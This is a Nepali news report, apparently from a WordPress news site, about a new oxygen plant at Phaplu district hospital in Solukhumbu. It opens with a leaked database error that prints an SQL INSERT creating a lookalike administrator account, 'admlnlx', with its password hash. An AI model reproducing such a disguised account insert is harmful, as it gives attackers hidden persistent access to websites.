WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4zO3pX67aX0TnssWCLueiyyViJAEI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 01:13:04', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बुमा अक्सिजन उत्पादन सुरु गरिएको छ । जिल्ला अस्पताल फाप्लुमा नै १ करोड २८ लाख रुपैयाँको लागतमा अक्सिजन प्लान्ट जडान गरेसगै जिल्लामा अक्सिजन उत्पादन गर्न थालिएको हो ।
अस्पतालमा जडान गरिएको अक्सिजन प्लाण्टबाट २४ घण्टामा ४० वटा खाली सिलिन्डर भर्न सकिने छ । एक पटकमा ५ वटा सिलिन्डर ३ घण्टामा भरिने छ ।
अक्सिजन अभावमा कुनै पनि बिरामीले अकालमा ज्यान गुमाउनु नपर्ने भएसँगै जिल्लामै अक्सिजन उत्पादन सुरु भएपछि अक्सिजन भर्नका लागि लाखौ रुपैया खर्चिएर बाहिर जानुपर्ने बाध्यता हटेको छ ।
आवश्यकताका आधारमा जिल्ला अस्पतालको अक्सिजन प्लाण्टबाट उत्पादन भएको अक्सिजन जिल्लाका अन्य स्वास्थ्य संस्थाले पनि लैजान सक्ने अस्पतालले जनाएको छ ।